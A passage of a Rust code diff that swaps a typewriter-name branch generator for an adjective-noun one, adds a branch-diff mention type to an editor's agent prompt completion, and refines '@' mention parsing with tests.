- "granta",
- "granville",
- "graphic",
- "gritzner",
- "groma",
- "guhl",
- "guidonia",
- "gundka",
- "hacabo",
- "haddad",
- "halberg",
- "halda",
- "hall",
- "hammond",
- "hammonia",
- "hanford",
- "hansa",
- "harmony",
- "harris",
- "hartford",
- "hassia",
- "hatch",
- "heady",
- "hebronia",
- "hebros",
- "hega",
- "helios",
- "helma",
- "herald",
- "hercules",
- "hermes",
- "herold",
- "heros",
- "hesperia",
- "hogar",
- "hooven",
- "hopkins",
- "horton",
- "hugin",
- "hungaria",
- "hurtu",
- "iberia",
- "idea",
- "ideal",
- "imperia",
- "impo",
- "industria",
- "industrio",
- "ingersoll",
- "international",
- "invicta",
- "irene",
- "iris",
- "iskra",
- "ivitsa",
- "ivriah",
- "jackson",
- "janalif",
- "janos",
- "jolux",
- "juki",
- "junior",
- "juventa",
- "juwel",
- "kamkap",
- "kamo",
- "kanzler",
- "kappel",
- "karli",
- "karstadt",
- "keaton",
- "kenbar",
- "keystone",
- "kim",
- "klein",
- "kneist",
- "knoch",
- "koh",
- "kolibri",
- "kolumbus",
- "komet",
- "kondor",
- "koniger",
- "konryu",
- "kontor",
- "kosmopolit",
- "krypton",
- "lambert",
- "lasalle",
- "lectra",
- "leframa",
- "lemair",
- "lemco",
- "liberty",
- "libia",
- "liga",
- "lignose",
- "lilliput",
- "lindeteves",
- "linowriter",
- "listvitsa",
- "ludolf",
- "lutece",
- "luxa",
- "lyubava",
- "mafra",
- "magnavox",
- "maher",
- "majestic",
- "majitouch",
- "manhattan",
- "mapuua",
- "marathon",
- "marburger",
- "maritsa",
- "maruzen",
- "maskelyne",
- "masspro",
- "matous",
- "mccall",
- "mccool",
- "mcloughlin",
- "mead",
- "mechno",
- "mehano",
- "meiselbach",
- "melbi",
- "melior",
- "melotyp",
- "mentor",
- "mepas",
- "mercedesia",
- "mercurius",
- "mercury",
- "merkur",
- "merritt",
- "merz",
- "messa",
- "meteco",
- "meteor",
- "micron",
- "mignon",
- "mikro",
- "minerva",
- "mirian",
- "mirina",
- "mitex",
- "molle",
- "monac",
- "monarch",
- "mondiale",
- "monica",
- "monofix",
- "monopol",
- "monpti",
- "monta",
- "montana",
- "montgomery",
- "moon",
- "morgan",
- "morris",
- "morse",
- "moya",
- "moyer",
- "munson",
- "musicwriter",
- "nadex",
- "nakajima",
- "neckermann",
- "neubert",
- "neya",
- "ninety",
- "nisa",
- "noiseless",
- "noor",
- "nora",
- "nord",
- "norden",
- "norica",
- "norma",
- "norman",
- "north",
- "nototyp",
- "nova",
- "novalevi",
- "odell",
- "odhner",
- "odo",
- "odoma",
- "ohio",
- "ohtani",
- "oliva",
- "oliver",
- "olivetti",
- "olympia",
- "omega",
- "optima",
- "orbis",
- "orel",
- "orga",
- "oriette",
- "orion",
- "orn",
- "orplid",
- "pacior",
- "pagina",
- "parisienne",
- "passat",
- "pearl",
- "peerless",
- "perfect",
- "perfecta",
- "perkeo",
- "perkins",
- "perlita",
- "pettypet",
- "phoenix",
- "piccola",
- "picht",
- "pinnock",
- "pionier",
- "plurotyp",
- "plutarch",
- "pneumatic",
- "pocket",
- "polyglott",
- "polygraph",
- "pontiac",
- "portable",
- "portex",
- "pozzi",
- "premier",
- "presto",
- "primavera",
- "progress",
- "protos",
- "pterotype",
- "pullman",
- "pulsatta",
- "quick",
- "racer",
- "radio",
- "rally",
- "rand",
- "readers",
- "reed",
- "referent",
- "reff",
- "regent",
- "regia",
- "regina",
- "rekord",
- "reliable",
- "reliance",
- "remagg",
- "rembrandt",
- "remer",
- "remington",
- "remsho",
- "remstar",
- "remtor",
- "reporters",
- "resko",
- "rex",
- "rexpel",
- "rheinita",
- "rheinmetall",
- "rival",
- "roberts",
- "robotron",
- "rocher",
- "rochester",
- "roebuck",
- "rofa",
- "roland",
- "rooy",
- "rover",
- "roxy",
- "roy",
- "royal",
- "rundstatler",
- "sabaudia",
- "sabb",
- "saleem",
- "salter",
- "sampo",
- "sarafan",
- "saturn",
- "saxonia",
- "schade",
- "schapiro",
- "schreibi",
- "scripta",
- "sears",
- "secor",
- "selectric",
- "selekta",
- "senator",
- "sense",
- "senta",
- "serd",
- "shilling",
- "shimade",
- "shimer",
- "sholes",
- "shuang",
- "siegfried",
- "siemag",
- "silma",
- "silver",
- "simplex",
- "simtype",
- "singer",
- "smith",
- "soemtron",
- "sonja",
- "speedwriter",
- "sphinx",
- "starlet",
- "stearns",
- "steel",
- "stella",
- "steno",
- "sterling",
- "stoewer",
- "stolzenberg",
- "stott",
- "strangfeld",
- "sture",
- "stylotyp",
- "sun",
- "superba",
- "superia",
- "supermetall",
- "surety",
- "swintec",
- "swissa",
- "talbos",
- "talleres",
- "tatrapoint",
- "taurus",
- "taylorix",
- "tell",
- "tempotype",
- "tippco",
- "titania",
- "tops",
- "towa",
- "toyo",
- "tradition",
- "transatlantic",
- "traveller",
- "trebla",
- "triumph",
- "turia",
- "typatune",
- "typen",
- "typorium",
- "ugro",
- "ultima",
- "unda",
- "underwood",
- "unica",
- "unitype",
- "ursula",
- "utax",
- "varityper",
- "vasanta",
- "vendex",
- "venus",
- "victor",
- "victoria",
- "video",
- "viking",
- "vira",
- "virotyp",
- "visigraph",
- "vittoria",
- "volcan",
- "vornado",
- "voss",
- "vultur",
- "waltons",
- "wanamaker",
- "wanderer",
- "ward",
- "warner",
- "waterloo",
- "waverley",
- "wayne",
- "webster",
- "wedgefield",
- "welco",
- "wellington",
- "wellon",
- "weltblick",
- "westphalia",
- "wiedmer",
- "williams",
- "wilson",
- "winkel",
- "winsor",
- "wizard",
- "woodstock",
- "woodwards",
- "yatran",
- "yost",
- "zenit",
- "zentronik",
- "zeta",
- "zeya",
+const ADJECTIVES: &[&str] = &[
+ "able", "agate", "agile", "alpine", "amber", "ample", "aqua", "arctic", "arid", "astral",
+ "autumn", "avid", "azure", "balmy", "birch", "bold", "boreal", "brave", "breezy", "brief",
+ "bright", "brisk", "broad", "bronze", "calm", "cerith", "civil", "clean", "clear", "clever",
+ "cobalt", "cool", "copper", "coral", "cozy", "crisp", "cubic", "cyan", "deft", "dense", "dewy",
+ "direct", "dusky", "dusty", "eager", "early", "earnest", "elder", "elfin", "equal", "even",
+ "exact", "faint", "fair", "fast", "fawn", "ferny", "fiery", "fine", "firm", "fleet", "floral",
+ "focal", "fond", "frank", "fresh", "frosty", "full", "gentle", "gilded", "glacial", "glad",
+ "glossy", "golden", "grand", "green", "gusty", "hale", "happy", "hardy", "hazel", "hearty",
+ "hilly", "humble", "hushed", "icy", "ideal", "inner", "iron", "ivory", "jade", "jovial",
+ "keen", "kind", "lapis", "leafy", "level", "light", "lilac", "limber", "lively", "local",
+ "lofty", "lucid", "lunar", "major", "maple", "mellow", "merry", "mild", "milky", "misty",
+ "modal", "modest", "mossy", "muted", "native", "naval", "neat", "nimble", "noble", "north",
+ "novel", "oaken", "ochre", "olive", "onyx", "opal", "open", "optic", "outer", "owed", "ozone",
+ "pale", "pastel", "pearl", "pecan", "peppy", "pilot", "placid", "plain", "plum", "plush",
+ "poised", "polar", "polished", "poplar", "prime", "proof", "proud", "pure", "quartz", "quick",
+ "quiet", "rapid", "raspy", "ready", "regal", "rooted", "rosy", "round", "royal", "ruby",
+ "ruddy", "russet", "rustic", "sage", "salty", "sandy", "satin", "scenic", "sedge", "serene",
+ "sharp", "sheer", "silky", "silver", "sleek", "smart", "smooth", "snowy", "solar", "solid",
+ "south", "spry", "stark", "steady", "steel", "steep", "still", "stoic", "stony", "stout",
+ "sturdy", "suede", "sunny", "supple", "sure", "swift", "tall", "tawny", "teal", "terse",
+ "thick", "tidal", "tidy", "timber", "topaz", "total", "trim", "tropic", "true", "tulip",
+ "upper", "urban", "valid", "vast", "velvet", "verde", "vivid", "vocal", "warm", "waxen",
+ "west", "whole", "wide", "wild", "wise", "witty", "woven", "young", "zealous", "zephyr",
+ "zesty", "zinc",
];
-/// Picks a typewriter name that isn't already taken by an existing branch.
-///
-/// Each entry in `existing_branches` is expected to be a full branch name
-/// like `"olivetti-a3f9b2c1"`. The prefix before the last `'-'` is treated
-/// as the taken typewriter name. Branches without a `'-'` are ignored.
+const NOUNS: &[&str] = &[
+ "anchor", "anvil", "arbor", "arch", "arrow", "atlas", "badge", "badger", "basin", "bay",
+ "beacon", "beam", "bell", "birch", "blade", "bloom", "bluff", "bolt", "bower", "breeze",
+ "bridge", "brook", "bunting", "cabin", "cairn", "canyon", "cape", "cedar", "chasm", "cliff",
+ "cloud", "clover", "coast", "cobble", "colt", "comet", "condor", "coral", "cove", "crane",
+ "crater", "creek", "crest", "curlew", "cypress", "dale", "dawn", "delta", "den", "dove",
+ "drake", "drift", "drum", "dune", "dusk", "eagle", "echo", "egret", "elk", "elm", "ember",
+ "falcon", "fawn", "fern", "ferry", "field", "finch", "fjord", "flame", "flint", "flower",
+ "forge", "fossil", "fox", "frost", "gale", "garnet", "gate", "gazelle", "geyser", "glade",
+ "glen", "gorge", "granite", "grove", "gull", "harbor", "hare", "haven", "hawk", "hazel",
+ "heath", "hedge", "heron", "hill", "hollow", "horizon", "ibis", "inlet", "isle", "ivy",
+ "jackal", "jasper", "juniper", "kestrel", "kinglet", "knoll", "lagoon", "lake", "lantern",
+ "larch", "lark", "laurel", "lava", "leaf", "ledge", "lily", "linden", "lodge", "loft", "lotus",
+ "lynx", "mantle", "maple", "marble", "marsh", "marten", "meadow", "merlin", "mesa", "mill",
+ "mint", "moon", "moose", "moss", "newt", "north", "nutmeg", "oak", "oasis", "obsidian",
+ "orbit", "orchid", "oriole", "osprey", "otter", "owl", "palm", "panther", "pass", "path",
+ "peak", "pebble", "pelican", "peony", "perch", "pier", "pine", "plover", "plume", "pond",
+ "poppy", "prairie", "prism", "puma", "quail", "quarry", "quartz", "rain", "rampart", "range",
+ "raven", "ravine", "reed", "reef", "ridge", "river", "robin", "rowan", "sage", "salmon",
+ "sequoia", "shore", "shrike", "sigma", "sky", "slate", "slope", "snow", "spark", "sparrow",
+ "spider", "spruce", "stag", "star", "stone", "stork", "storm", "stream", "summit", "swift",
+ "sycamore", "tern", "terrace", "thistle", "thorn", "thrush", "tide", "timber", "torch",
+ "tower", "trail", "trout", "tulip", "tundra", "vale", "valley", "veranda", "viper", "vista",
+ "vole", "walrus", "warbler", "willow", "wolf", "wren", "yew", "zenith",
+];
+
+/// Generates a branch name in `"adjective-noun"` format (e.g. `"swift-falcon"`).
///
-/// Returns `None` when every name in the pool is already taken.
-pub fn pick_typewriter_name(
- existing_branches: &[&str],
- rng: &mut impl Rng,
-) -> Option<&'static str> {
- let disallowed: HashSet<&str> = existing_branches
- .iter()
- .filter_map(|branch| branch.rsplit_once('-').map(|(prefix, _)| prefix))
- .collect();
+/// Tries up to 100 random combinations, skipping any name that already appears
+/// in `existing_branches`. Returns `None` if no unused name is found.
+pub fn generate_branch_name(existing_branches: &[&str], rng: &mut impl Rng) -> Option<String> {
+ let existing: HashSet<&str> = existing_branches.iter().copied().collect();
- let available: Vec<&'static str> = TYPEWRITER_NAMES
- .iter()
- .copied()
- .filter(|name| !disallowed.contains(name))
- .collect();
+ for _ in 0..100 {
+ let adjective = ADJECTIVES[rng.random_range(0..ADJECTIVES.len())];
+ let noun = NOUNS[rng.random_range(0..NOUNS.len())];
+ let name = format!("{adjective}-{noun}");
- if available.is_empty() {
- return None;
+ if !existing.contains(name.as_str()) {
+ return Some(name);
+ }
}
- let index = rng.random_range(0..available.len());
- Some(available[index])
-}
-
-/// Generates a branch name like `"olivetti-a3f9b2c1"` by picking a typewriter
-/// name that isn't already taken and appending an 8-character alphanumeric hash.
-///
-/// Returns `None` when every typewriter name in the pool is already taken.
-pub fn generate_branch_name(existing_branches: &[&str], rng: &mut impl Rng) -> Option<String> {
- let typewriter_name = pick_typewriter_name(existing_branches, rng)?;
- let hash: String = (0..8)
- .map(|_| {
- let idx: u8 = rng.random_range(0..36);
- if idx < 10 {
- (b'0' + idx) as char
- } else {
- (b'a' + idx - 10) as char
- }
- })
- .collect();
- Some(format!("{typewriter_name}-{hash}"))
+ None
}
#[cfg(test)]
@@ -713,134 +80,91 @@ mod tests {
use rand::rngs::StdRng;
#[gpui::test(iterations = 10)]
- fn test_pick_typewriter_name_with_no_disallowed(mut rng: StdRng) {
- let name = pick_typewriter_name(&[], &mut rng);
- assert!(name.is_some());
- assert!(TYPEWRITER_NAMES.contains(&name.unwrap()));
- }
-
- #[gpui::test(iterations = 10)]
- fn test_pick_typewriter_name_excludes_taken_names(mut rng: StdRng) {
- let branch_names = &["olivetti-abc12345", "selectric-def67890"];
- let name = pick_typewriter_name(branch_names, &mut rng).unwrap();
- assert_ne!(name, "olivetti");
- assert_ne!(name, "selectric");
- }
-
- #[gpui::test]
- fn test_pick_typewriter_name_all_taken(mut rng: StdRng) {
- let branch_names: Vec<String> = TYPEWRITER_NAMES
- .iter()
- .map(|name| format!("{name}-00000000"))
- .collect();
- let branch_name_refs: Vec<&str> = branch_names.iter().map(|s| s.as_str()).collect();
- let name = pick_typewriter_name(&branch_name_refs, &mut rng);
- assert!(name.is_none());
- }
-
- #[gpui::test(iterations = 10)]
- fn test_pick_typewriter_name_ignores_branches_without_hyphen(mut rng: StdRng) {
- let branch_names = &["main", "develop", "feature"];
- let name = pick_typewriter_name(branch_names, &mut rng);
- assert!(name.is_some());
- assert!(TYPEWRITER_NAMES.contains(&name.unwrap()));
+ fn test_generate_branch_name_format(mut rng: StdRng) {
+ let name = generate_branch_name(&[], &mut rng).unwrap();
+ let (adjective, noun) = name.split_once('-').expect("name should contain a hyphen");
+ assert!(
+ ADJECTIVES.contains(&adjective),
+ "{adjective:?} is not in ADJECTIVES"
+ );
+ assert!(NOUNS.contains(&noun), "{noun:?} is not in NOUNS");
}
- #[gpui::test(iterations = 10)]
- fn test_generate_branch_name_format(mut rng: StdRng) {
- let branch_name = generate_branch_name(&[], &mut rng).unwrap();
- let (prefix, suffix) = branch_name.rsplit_once('-').unwrap();
- assert!(TYPEWRITER_NAMES.contains(&prefix));
- assert_eq!(suffix.len(), 8);
- assert!(suffix.chars().all(|c| c.is_ascii_alphanumeric()));
+ #[gpui::test(iterations = 100)]
+ fn test_generate_branch_name_avoids_existing(mut rng: StdRng) {
+ let existing = &["swift-falcon", "calm-river", "bold-cedar"];
+ let name = generate_branch_name(existing, &mut rng).unwrap();
+ for &branch in existing {
+ assert_ne!(
+ name, branch,
+ "generated name should not match an existing branch"
+ );
+ }
}
#[gpui::test]
- fn test_generate_branch_name_returns_none_when_exhausted(mut rng: StdRng) {
- let branch_names: Vec<String> = TYPEWRITER_NAMES
+ fn test_generate_branch_name_returns_none_when_stuck(mut rng: StdRng) {
+ let all_names: Vec<String> = ADJECTIVES
.iter()
- .map(|name| format!("{name}-00000000"))
+ .flat_map(|adj| NOUNS.iter().map(move |noun| format!("{adj}-{noun}")))
.collect();
- let branch_name_refs: Vec<&str> = branch_names.iter().map(|s| s.as_str()).collect();
- let result = generate_branch_name(&branch_name_refs, &mut rng);
+ let refs: Vec<&str> = all_names.iter().map(|s| s.as_str()).collect();
+ let result = generate_branch_name(&refs, &mut rng);
assert!(result.is_none());
}
- #[gpui::test(iterations = 100)]
- fn test_generate_branch_name_never_reuses_taken_prefix(mut rng: StdRng) {
- let existing = &["olivetti-123abc", "selectric-def456"];
- let branch_name = generate_branch_name(existing, &mut rng).unwrap();
- let (prefix, _) = branch_name.rsplit_once('-').unwrap();
- assert_ne!(prefix, "olivetti");
- assert_ne!(prefix, "selectric");
- }
+ #[test]
+ fn test_adjectives_are_valid() {
+ let mut seen = HashSet::default();
+ for &word in ADJECTIVES {
+ assert!(seen.insert(word), "duplicate entry in ADJECTIVES: {word:?}");
+ }
- #[gpui::test(iterations = 100)]
- fn test_generate_branch_name_avoids_multiple_taken_prefixes(mut rng: StdRng) {
- let existing = &[
- "olivetti-aaa11111",
- "selectric-bbb22222",
- "corona-ccc33333",
- "remington-ddd44444",
- "underwood-eee55555",
- ];
- let taken_prefixes: HashSet<&str> = existing
- .iter()
- .filter_map(|b| b.rsplit_once('-').map(|(prefix, _)| prefix))
- .collect();
- let branch_name = generate_branch_name(existing, &mut rng).unwrap();
- let (prefix, _) = branch_name.rsplit_once('-').unwrap();
- assert!(
- !taken_prefixes.contains(prefix),
- "generated prefix {prefix:?} collides with an existing branch"
- );
- }
+ for window in ADJECTIVES.windows(2) {
+ assert!(
+ window[0] < window[1],
+ "ADJECTIVES is not sorted: {0:?} should come before {1:?}",
+ window[0],
+ window[1],
+ );
+ }
- #[gpui::test(iterations = 100)]
- fn test_generate_branch_name_with_varied_hash_suffixes(mut rng: StdRng) {
- let existing = &[
- "olivetti-aaaaaaaa",
- "olivetti-bbbbbbbb",
- "olivetti-cccccccc",
- ];
- let branch_name = generate_branch_name(existing, &mut rng).unwrap();
- let (prefix, _) = branch_name.rsplit_once('-').unwrap();
- assert_ne!(
- prefix, "olivetti",
- "should avoid olivetti regardless of how many variants exist"
- );
+ for &word in ADJECTIVES {
+ assert!(
+ !word.contains('-'),
+ "ADJECTIVES entry contains a hyphen: {word:?}"
+ );
+ assert!(
+ word.chars().all(|c| c.is_lowercase()),
+ "ADJECTIVES entry is not all lowercase: {word:?}"
+ );
+ }
}
#[test]
- fn test_typewriter_names_are_valid() {
+ fn test_nouns_are_valid() {
let mut seen = HashSet::default();
- for &name in TYPEWRITER_NAMES {
- assert!(
- seen.insert(name),
- "duplicate entry in TYPEWRITER_NAMES: {name:?}"
- );
+ for &word in NOUNS {
+ assert!(seen.insert(word), "duplicate entry in NOUNS: {word:?}");
}
- for window in TYPEWRITER_NAMES.windows(2) {
+ for window in NOUNS.windows(2) {
assert!(
- window[0] <= window[1],
- "TYPEWRITER_NAMES is not sorted: {0:?} should come after {1:?}",
- window[1],
+ window[0] < window[1],
+ "NOUNS is not sorted: {0:?} should come before {1:?}",
window[0],
+ window[1],
);
}
- for &name in TYPEWRITER_NAMES {
+ for &word in NOUNS {
assert!(
- !name.contains('-'),
- "TYPEWRITER_NAMES entry contains a hyphen: {name:?}"
+ !word.contains('-'),
+ "NOUNS entry contains a hyphen: {word:?}"
);
- }
-
- for &name in TYPEWRITER_NAMES {
assert!(
- name.chars().all(|c| c.is_lowercase() || !c.is_alphabetic()),
- "TYPEWRITER_NAMES entry is not lowercase: {name:?}"
+ word.chars().all(|c| c.is_lowercase()),
+ "NOUNS entry is not all lowercase: {word:?}"
);
}
}
@@ -4,6 +4,7 @@ use std::path::PathBuf;
use std::sync::Arc;
use std::sync::atomic::AtomicBool;
+use crate::DEFAULT_THREAD_TITLE;
use crate::ThreadHistory;
use acp_thread::MentionUri;
use agent_client_protocol as acp;
@@ -64,6 +65,7 @@ pub(crate) enum PromptContextType {
Thread,
Rules,
Diagnostics,
+ BranchDiff,
}
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
@@ -102,6 +104,7 @@ impl TryFrom<&str> for PromptContextType {
"thread" => Ok(Self::Thread),
"rule" => Ok(Self::Rules),
"diagnostics" => Ok(Self::Diagnostics),
+ "diff" => Ok(Self::BranchDiff),
_ => Err(format!("Invalid context picker mode: {}", value)),
}
}
@@ -116,6 +119,7 @@ impl PromptContextType {
Self::Thread => "thread",
Self::Rules => "rule",
Self::Diagnostics => "diagnostics",
+ Self::BranchDiff => "branch diff",
}
}
@@ -127,6 +131,7 @@ impl PromptContextType {
Self::Thread => "Threads",
Self::Rules => "Rules",
Self::Diagnostics => "Diagnostics",
+ Self::BranchDiff => "Branch Diff",
}
}
@@ -138,6 +143,7 @@ impl PromptContextType {
Self::Thread => IconName::Thread,
Self::Rules => IconName::Reader,
Self::Diagnostics => IconName::Warning,
+ Self::BranchDiff => IconName::GitBranch,
}
}
}
@@ -150,6 +156,12 @@ pub(crate) enum Match {
Fetch(SharedString),
Rules(RulesContextEntry),
Entry(EntryMatch),
+ BranchDiff(BranchDiffMatch),
+}
+
+#[derive(Debug, Clone)]
+pub struct BranchDiffMatch {
+ pub base_ref: SharedString,
}
impl Match {
@@ -162,6 +174,7 @@ impl Match {
Match::Symbol(_) => 1.,
Match::Rules(_) => 1.,
Match::Fetch(_) => 1.,
+ Match::BranchDiff(_) => 1.,
}
}
}
@@ -180,7 +193,7 @@ pub struct EntryMatch {
fn session_title(title: Option<SharedString>) -> SharedString {
title
.filter(|title| !title.is_empty())
- .unwrap_or_else(|| SharedString::new_static("New Thread"))
+ .unwrap_or_else(|| SharedString::new_static(DEFAULT_THREAD_TITLE))
}
#[derive(Debug, Clone)]
@@ -211,7 +224,7 @@ pub struct PromptCompletionProvider<T: PromptCompletionProviderDelegate> {
source: Arc<T>,
editor: WeakEntity<Editor>,
mention_set: Entity<MentionSet>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
prompt_store: Option<Entity<PromptStore>>,
workspace: WeakEntity<Workspace>,
}
@@ -221,7 +234,7 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
source: T,
editor: WeakEntity<Editor>,
mention_set: Entity<MentionSet>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
prompt_store: Option<Entity<PromptStore>>,
workspace: WeakEntity<Workspace>,
) -> Self {
@@ -781,6 +794,47 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
}
}
+ fn build_branch_diff_completion(
+ base_ref: SharedString,
+ source_range: Range<Anchor>,
+ source: Arc<T>,
+ editor: WeakEntity<Editor>,
+ mention_set: WeakEntity<MentionSet>,
+ workspace: Entity<Workspace>,
+ cx: &mut App,
+ ) -> Completion {
+ let uri = MentionUri::GitDiff {
+ base_ref: base_ref.to_string(),
+ };
+ let crease_text: SharedString = format!("Branch Diff (vs {})", base_ref).into();
+ let display_text = format!("@{}", crease_text);
+ let new_text = format!("[{}]({}) ", display_text, uri.to_uri());
+ let new_text_len = new_text.len();
+ let icon_path = uri.icon_path(cx);
+
+ Completion {
+ replace_range: source_range.clone(),
+ new_text,
+ label: CodeLabel::plain(crease_text.to_string(), None),
+ documentation: None,
+ source: project::CompletionSource::Custom,
+ icon_path: Some(icon_path),
+ match_start: None,
+ snippet_deduplication_key: None,
+ insert_text_mode: None,
+ confirm: Some(confirm_completion_callback(
+ crease_text,
+ source_range.start,
+ new_text_len - 1,
+ uri,
+ source,
+ editor,
+ mention_set,
+ workspace,
+ )),
+ }
+ }
+
fn search_slash_commands(&self, query: String, cx: &mut App) -> Task<Vec<AvailableCommand>> {
let commands = self.source.available_commands(cx);
if commands.is_empty() {
@@ -812,6 +866,27 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
})
}
+ fn fetch_branch_diff_match(
+ &self,
+ workspace: &Entity<Workspace>,
+ cx: &mut App,
+ ) -> Option<Task<Option<BranchDiffMatch>>> {
+ let project = workspace.read(cx).project().clone();
+ let repo = project.read(cx).active_repository(cx)?;
+
+ let default_branch_receiver = repo.update(cx, |repo, _| repo.default_branch(true));
+
+ Some(cx.spawn(async move |_cx| {
+ let base_ref = default_branch_receiver
+ .await
+ .ok()
+ .and_then(|r| r.ok())
+ .flatten()?;
+
+ Some(BranchDiffMatch { base_ref })
+ }))
+ }
+
fn search_mentions(
&self,
mode: Option<PromptContextType>,
@@ -846,7 +921,7 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
}
Some(PromptContextType::Thread) => {
- if let Some(history) = self.history.upgrade() {
+ if let Some(history) = self.history.as_ref().and_then(|h| h.upgrade()) {
let sessions = history
.read(cx)
.sessions()
@@ -892,6 +967,8 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
Some(PromptContextType::Diagnostics) => Task::ready(Vec::new()),
+ Some(PromptContextType::BranchDiff) => Task::ready(Vec::new()),
+
None if query.is_empty() => {
let recent_task = self.recent_context_picker_entries(&workspace, cx);
let entries = self
@@ -905,9 +982,25 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
})
.collect::<Vec<_>>();
+ let branch_diff_task = if self
+ .source
+ .supports_context(PromptContextType::BranchDiff, cx)
+ {
+ self.fetch_branch_diff_match(&workspace, cx)
+ } else {
+ None
+ };
+
cx.spawn(async move |_cx| {
let mut matches = recent_task.await;
matches.extend(entries);
+
+ if let Some(branch_diff_task) = branch_diff_task {
+ if let Some(branch_diff_match) = branch_diff_task.await {
+ matches.push(Match::BranchDiff(branch_diff_match));
+ }
+ }
+
matches
})
}
@@ -924,7 +1017,16 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
.map(|(ix, entry)| StringMatchCandidate::new(ix, entry.keyword()))
.collect::<Vec<_>>();
- cx.background_spawn(async move {
+ let branch_diff_task = if self
+ .source
+ .supports_context(PromptContextType::BranchDiff, cx)
+ {
+ self.fetch_branch_diff_match(&workspace, cx)
+ } else {
+ None
+ };
+
+ cx.spawn(async move |cx| {
let mut matches = search_files_task
.await
.into_iter()
@@ -949,6 +1051,26 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
})
}));
+ if let Some(branch_diff_task) = branch_diff_task {
+ let branch_diff_keyword = PromptContextType::BranchDiff.keyword();
+ let branch_diff_matches = fuzzy::match_strings(
+ &[StringMatchCandidate::new(0, branch_diff_keyword)],
+ &query,
+ false,
+ true,
+ 1,
+ &Arc::new(AtomicBool::default()),
+ cx.background_executor().clone(),
+ )
+ .await;
+
+ if !branch_diff_matches.is_empty() {
+ if let Some(branch_diff_match) = branch_diff_task.await {
+ matches.push(Match::BranchDiff(branch_diff_match));
+ }
+ }
+ }
+
matches.sort_by(|a, b| {
b.score()
.partial_cmp(&a.score())
@@ -977,11 +1099,11 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
if let Some(agent_panel) = workspace.panel::<AgentPanel>(cx)
&& let Some(thread) = agent_panel.read(cx).active_agent_thread(cx)
+ && let Some(title) = thread.read(cx).title()
{
- let thread = thread.read(cx);
mentions.insert(MentionUri::Thread {
- id: thread.session_id().clone(),
- name: thread.title().into(),
+ id: thread.read(cx).session_id().clone(),
+ name: title.to_string(),
});
}
@@ -1025,7 +1147,7 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
return Task::ready(recent);
}
- if let Some(history) = self.history.upgrade() {
+ if let Some(history) = self.history.as_ref().and_then(|h| h.upgrade()) {
const RECENT_COUNT: usize = 2;
recent.extend(
history
@@ -1364,6 +1486,17 @@ impl<T: PromptCompletionProviderDelegate> CompletionProvider for PromptCompletio
cx,
)
}
+ Match::BranchDiff(branch_diff) => {
+ Some(Self::build_branch_diff_completion(
+ branch_diff.base_ref,
+ source_range.clone(),
+ source.clone(),
+ editor.clone(),
+ mention_set.clone(),
+ workspace.clone(),
+ cx,
+ ))
+ }
})
.collect::<Vec<_>>()
});
@@ -1559,27 +1692,34 @@ impl MentionCompletion {
offset_to_line: usize,
supported_modes: &[PromptContextType],
) -> Option<Self> {
- let last_mention_start = line.rfind('@')?;
+ // Find the rightmost '@' that has a word boundary before it and no whitespace immediately after
+ let mut last_mention_start = None;
+ for (idx, _) in line.rmatch_indices('@') {
+ // No whitespace immediately after '@'
+ if line[idx + 1..]
+ .chars()
+ .next()
+ .is_some_and(|c| c.is_whitespace())
+ {
+ continue;
+ }
- // No whitespace immediately after '@'
- if line[last_mention_start + 1..]
- .chars()
- .next()
- .is_some_and(|c| c.is_whitespace())
- {
- return None;
- }
+ // Must be a word boundary before '@'
+ if idx > 0
+ && line[..idx]
+ .chars()
+ .last()
+ .is_some_and(|c| !c.is_whitespace())
+ {
+ continue;
+ }
- // Must be a word boundary before '@'
- if last_mention_start > 0
- && line[..last_mention_start]
- .chars()
- .last()
- .is_some_and(|c| !c.is_whitespace())
- {
- return None;
+ last_mention_start = Some(idx);
+ break;
}
+ let last_mention_start = last_mention_start?;
+
let rest_of_line = &line[last_mention_start + 1..];
let mut mode = None;
@@ -2356,6 +2496,48 @@ mod tests {
None,
"Should not parse with a space after @ at the start of the line"
);
+
+ assert_eq!(
+ MentionCompletion::try_parse(
+ "@fetch https://www.npmjs.com/package/@matterport/sdk",
+ 0,
+ &[PromptContextType::Fetch]
+ ),
+ Some(MentionCompletion {
+ source_range: 0..52,
+ mode: Some(PromptContextType::Fetch),
+ argument: Some("https://www.npmjs.com/package/@matterport/sdk".to_string()),
+ }),
+ "Should handle URLs with @ in the path"
+ );
+
+ assert_eq!(
+ MentionCompletion::try_parse(
+ "@fetch https://example.com/@org/@repo/file",
+ 0,
+ &[PromptContextType::Fetch]
+ ),
+ Some(MentionCompletion {
+ source_range: 0..42,
+ mode: Some(PromptContextType::Fetch),
+ argument: Some("https://example.com/@org/@repo/file".to_string()),
+ }),
+ "Should handle URLs with multiple @ characters"
+ );
+
+ assert_eq!(
+ MentionCompletion::try_parse(
+ "@fetch https://example.com/@",
+ 0,
+ &[PromptContextType::Fetch]
+ ),
+ Some(MentionCompletion {
+ source_range: 0..28,
+ mode: Some(PromptContextType::Fetch),
+ argument: Some("https://example.com/@".to_string()),
+ }),
+ "Should parse URL ending with @ (even if URL is incomplete)"
+ );
}
#[gpui::test]
@@ -350,10 +350,7 @@ impl ConfigOptionSelector {
)
.label_size(LabelSize::Small)
.color(Color::Muted)
- .icon(icon)
- .icon_size(IconSize::XSmall)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
+ .end_icon(Icon::new(icon).size(IconSize::XSmall).color(Color::Muted))
.disabled(self.setting_value)
}
}
@@ -1,17 +1,18 @@
use acp_thread::{
AcpThread, AcpThreadEvent, AgentSessionInfo, AgentThreadEntry, AssistantMessage,
AssistantMessageChunk, AuthRequired, LoadError, MentionUri, PermissionOptionChoice,
